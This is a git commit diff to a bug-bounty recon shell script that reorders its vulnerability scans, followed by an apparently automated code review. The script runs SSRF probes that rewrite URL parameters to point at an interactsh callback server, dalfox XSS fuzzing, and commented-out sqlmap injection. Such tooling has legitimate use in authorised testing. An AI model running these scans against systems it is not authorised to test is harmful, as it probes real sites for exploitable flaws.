
Commit 41992fc

committed
first call ssrf attack then xss
1 parent fb84ee7 commit 41992fc


1 file changed

+16
-15
lines changed


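--- a/smartrecon.sh
+++ b/smartrecon.sh
@@ -195,12 +195,27 @@ vulnscanner(){
 cat ./$domain/$foldername/urllist.txt | nuclei -tags exposure,unauth,cache -o ./$domain/$foldername/nuclei.txt -silent; notify -bulk -data ./$domain/$foldername/nuclei.txt -silent
 
 
+echo -e "${green}Starting up listen server...${reset}"
+interactsh-client -v &> ./$domain/$foldername/listen_server.txt & SERVER_PID=$!
+sleep 5 # to properly start listen server
+LISTENSERVER=$(tail -n 1 ./$domain/$foldername/listen_server.txt)
+LISTENSERVER=$(echo $LISTENSERVER | cut -f2 -d ' ')
+echo "Listen server is up $LISTENSERVER with PID=$SERVER_PID"
+
+
+echo -e "${green}find SSRF vulnerability ...${reset}"
+cat ./$domain/$foldername/waybackurls.txt | gf ssrf | qsreplace https://$LISTENSERVER | httpx -silent | tee ./$domain/$foldername/ssrf_url.txt
+notify -bulk -data ./$domain/$foldername/ssrf_url.txt -silent
+
+# kill listen server
+kill_listen_server
+
+
 echo -e "${green}find Xss vulnerability ...${reset}"
 python3 $paramspider -d $domain -s TRUE -e jpg,jpeg,gif,css,js,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt,eot -q -o ./$domain/$foldername/xss_result.txt
 cat ./$domain/$foldername/xss_result.txt | qsreplace -a | httpx -silent -threads 500 -mc 200 | dalfox pipe -S | tee ./$domain/$foldername/xss_raw_result.txt
 cat ./$domain/$foldername/xss_raw_result.txt | cut -d ' ' -f2 | tee ./$domain/$foldername/xss_result.txt; notify -bulk -data ./$domain/$foldername/xss_result.txt -silent
 
-
 # echo -e "${green}find sql injection with wayback ...${reset}"
 # python3 paramspider.py -d $domain -s TRUE -e woff,ttf,eot,css,js,png,svg,jpg | deduplicate --sort | httpx -silent | sqlmap
 
@@ -216,20 +231,6 @@ vulnscanner(){
 # echo -e "${green}find dom xss with parameter pollution vulnerability ...${reset}"
 # cat ./$domain/$foldername/waybackurls.txt | httpx -silent | ppmap
 
-echo -e "${green}Starting up listen server...${reset}"
-interactsh-client -v &> ./$domain/$foldername/listen_server.txt & SERVER_PID=$!
-sleep 5 # to properly start listen server
-LISTENSERVER=$(tail -n 1 ./$domain/$foldername/listen_server.txt)
-LISTENSERVER=$(echo $LISTENSERVER | cut -f2 -d ' ')
-echo "Listen server is up $LISTENSERVER with PID=$SERVER_PID"
-
-
-echo -e "${green}find SSRF vulnerability ...${reset}"
-cat ./$domain/$foldername/waybackurls.txt | gf ssrf | qsreplace https://$LISTENSERVER | httpx -silent | tee ./$domain/$foldername/ssrf_url.txt
-notify -bulk -data ./$domain/$foldername/ssrf_url.txt -silent
-
-# kill listen server
-kill_listen_server
 }
 
 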
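Review bot: The relocated block never validates `LISTENSERVER` after the fixed `sleep 5` and the `tail -n 1` / `cut` parse (new lines 200-202). If the client starts slowly or fails, the variable is empty, every URL is rewritten to a bare `https://`, and the resulting list is still pushed through `notify` as if it were a result. A guard right after line 202 would stop that: `[ -n "$LISTENSERVER" ] || { echo "listen server did not start" >&2; kill_listen_server; return 1; }`. Separately, `$domain`, `$foldername` and `$LISTENSERVER` are unquoted in every path and pipeline here, so a value containing spaces or glob characters changes which files the operator's own shell reads and writes; quoting them (`"./$domain/$foldername/ssrf_url.txt"`) avoids that. Because the background client is now started mid-function, an interrupt before `kill_listen_server` on line 211 leaves it running, which a `trap` on EXIT/INT would cover; `vulnscanner` begins and `kill_listen_server` is defined outside the visible hunks.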
